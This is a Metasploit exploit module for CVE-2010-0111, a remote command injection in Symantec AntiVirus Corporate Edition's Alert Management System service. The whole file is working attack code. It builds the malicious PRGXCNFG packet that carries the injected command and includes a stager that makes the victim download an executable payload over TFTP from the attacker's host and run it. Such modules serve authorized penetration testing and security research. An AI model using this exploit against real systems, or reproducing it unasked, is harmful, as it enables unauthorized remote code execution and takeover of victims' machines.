##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
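class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::EXE

  # Longest command line the handler service will accept (see execute_command).
  MAX_CMD_LENGTH = 128

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution',
        'Description' => %q{
          Symantec System Center Alert Management System is prone to a
          remote command-injection vulnerability because the application fails
          to properly sanitize user-supplied input. This is part of Symantec
          AntiVirus Corporate Edition 8.0 - 10.1.7.
        },
        'Author' => [ 'MC' ],
        'License' => MSF_LICENSE,
        'References' => [
          ['OSVDB', '66807'],
          ['BID', '41959'],
          ['CVE', '2010-0111'],
          ['URL', 'http://www.foofus.net/~spider/code/AMS2_072610.txt'],
        ],
        'Targets' => [
          [
            'Windows Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win'
            }
          ]
        ],
        'Privileged' => true,
        'Platform' => 'win',
        'DefaultTarget' => 0,
        'DisclosureDate' => '2010-07-26',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([
      Opt::RPORT(38292),
      # A custom command bypasses the TFTP stager entirely: no payload is
      # generated and no handler is started.
      OptString.new('CMD', [ false, 'Execute this command instead of using command stager', ""]),
      # Only required for the stager path; the target's tftp client pulls the
      # EXE from this address.
      OptAddress.new('LHOST', [ false, 'The listen IP address from where the victim downloads the payload' ])
    ])
  end

  # Stage the EXE payload over TFTP: serve it from this host, make the target
  # fetch it with the built-in tftp client, then make the target run it.
  # The listener started here is torn down in #cleanup.
  def windows_stager
    @pl = generate_payload_exe
    payload_name = "#{Rex::Text.rand_text_alpha_upper(11)}.exe"

    @tftp = Rex::Proto::TFTP::Server.new
    # Third argument presumably marks the file as single-serve — see
    # Rex::Proto::TFTP::Server#register_file.
    @tftp.register_file(payload_name, @pl, true)
    @tftp.start

    print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
    # tftp.exe on Windows: -i selects binary (octet) transfer.
    execute_command("tftp -i #{datastore['LHOST']} GET #{payload_name}")
    print_status("Attempting to execute the payload...")
    execute_command(payload_name)
  end

  # Submit one command line to the AMS handler service.
  #
  # Nothing is authenticated and no response is read: the request is written,
  # the module pauses for three seconds, and the connection is closed. Success
  # is therefore assumed, not confirmed.
  #
  # @param cmd [String] command line for the service to run; at most
  #   MAX_CMD_LENGTH bytes and free of NUL bytes, because the request carries
  #   it as a length-prefixed, NUL-terminated string.
  # @param opts [Hash] unused; retained so existing callers keep working.
  # @raise [Msf::Exploit::Failed] via fail_with when cmd cannot be encoded.
  def execute_command(cmd, opts = {})
    # Validate before touching the network so a rejected command never
    # leaves a half-open connection behind.
    if cmd.bytesize > MAX_CMD_LENGTH
      fail_with(Failure::BadConfig, "Command strings greater than #{MAX_CMD_LENGTH} characters will not be processed!")
    end
    if cmd.include?("\x00")
      fail_with(Failure::BadConfig, 'Command strings must not contain NUL bytes!')
    end

    packet = build_request(cmd)

    connect
    begin
      sock.put(packet)
      # Give the service a moment to act on the request before tearing down.
      select(nil, nil, nil, 3)
    ensure
      disconnect
    end
  end

  def exploit
    cmd = datastore['CMD']
    unless cmd.blank?
      print_status("Executing command '#{cmd}'")
      execute_command(cmd)
      return
    end

    case target['Platform']
    when 'win'
      if datastore['LHOST'].blank?
        fail_with(Failure::BadConfig, 'If no custom CMD is set, LHOST is required.')
      end
      windows_stager
    else
      fail_with(Failure::NoTarget, 'Target not supported.')
    end

    handler
  end

  # Stop the TFTP listener (when the stager started one) so its UDP socket
  # does not outlive the exploit run.
  # NOTE(review): Rex::Proto::TFTP::Server#stop is expected to wait for
  # in-flight transfers before closing — confirm against the Rex version in use.
  def cleanup
    @tftp.stop if @tftp
    super
  end

  private

  # Encode a string attribute value the way the original PoC does: two
  # big-endian u16 length fields (bytesize + 3, bytesize + 1) and a leading
  # NUL before the bytes. The next attribute's leading "\x00" terminates it,
  # so values are limited to well under 256 bytes by construction.
  def encoded_value(value)
    [value.bytesize + 3].pack('n') + [value.bytesize + 1].pack('n') + "\x00" + value
  end

  # Build the PRGXCNFG request that carries cmd in both the ConfigurationName
  # and CommandLine attributes. The byte layout is reproduced from the
  # original PoC; the hard-coded header fields are not understood here.
  #
  # @param cmd [String] already validated by execute_command
  # @return [String] request bytes, padded with as many NULs as it is long
  def build_request(cmd)
    string_uno = Rex::Text.rand_text_alpha_upper(11)
    string_dos = Rex::Text.rand_text_alpha_upper(rand(5..8))

    packet = "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00".dup
    # "\xc0\xa8\x02\x64" reads as 192.168.2.100 — kept from the original PoC;
    # presumably ignored by the service, TODO confirm.
    packet << "\x02\x00\x95\x94\xc0\xa8\x02\x64\x00\x00\x00\x00\x00\x00\x00\x00"
    packet << "\xe8\x03\x00\x00"
    packet << 'PRGXCNFG'
    packet << "\x10\x00\x00\x00"
    packet << "\x00\x00\x00\x00\x04"
    packet << 'ALHD\F'
    packet << "\x00\x00\x01\x00\x00"
    packet << "\x00\x01\x00\x0e\x00"
    packet << 'Risk Repaired'
    packet << "\x00\x25\x00"
    packet << 'Symantec Antivirus Corporate Edition'
    packet << "\x00\xf9\x1d\x13\x4a\x3f"
    packet << [string_uno.bytesize + 1].pack('v') + string_uno

    # Attribute names carry their own little-endian length (name + NUL);
    # every value below is filler except the two that hold cmd.
    packet << "\x00\x08\x08\x0a"
    packet << "\x00" + 'Risk Name'
    packet << encoded_value(string_dos)
    packet << "\x00\x08\x0a\x00"
    packet << 'File Path'
    packet << encoded_value(string_dos)
    packet << "\x00\x08\x11\x00"
    packet << 'Requested Action'
    packet << encoded_value(string_dos)
    packet << "\x00\x08\x0e\x00"
    packet << 'Actual Action'
    packet << encoded_value(string_dos)
    packet << "\x00\x08\x07\x00"
    packet << 'Logger'
    packet << encoded_value(string_dos)
    packet << "\x00\x08\x05\x00"
    packet << 'User'
    packet << encoded_value(string_dos)
    packet << "\x00\x08\x09\x00"
    packet << 'Hostname'
    packet << "\x00\x0e\x00" + [string_uno.bytesize + 1].pack('v') + string_uno
    packet << "\x00\x08\x13\x00"
    packet << 'Corrective Actions'
    packet << encoded_value(string_dos)

    # The injected command: ConfigurationName and CommandLine.
    packet << "\x00\x00\x07\x08\x12\x00"
    packet << 'ConfigurationName'
    packet << encoded_value(cmd)
    packet << "\x00\x08\x0c\x00"
    packet << 'CommandLine'
    packet << encoded_value(cmd)

    packet << "\x00\x08\x08\x00"
    packet << 'RunArgs'
    packet << "\x00\x04\x00\x02\x00"
    packet << "\x20\x00\x03\x05\x00"
    packet << 'Mode'
    packet << "\x00\x04\x00\x02\x00\x00\x00"
    packet << "\x0a\x0d\x00"
    packet << 'FormatString'
    packet << "\x00\x02\x00\x00\x00\x08\x12\x00"
    packet << 'ConfigurationName'
    packet << "\x00\x02\x00\x00\x00\x08\x0c\x00"
    packet << 'HandlerHost'
    packet << encoded_value(string_dos)

    # Trailing NUL padding equal to the request's byte length (bytesize, not
    # character count: the buffer holds non-UTF-8 bytes).
    packet << "\x00" * packet.bytesize
    packet
  end
end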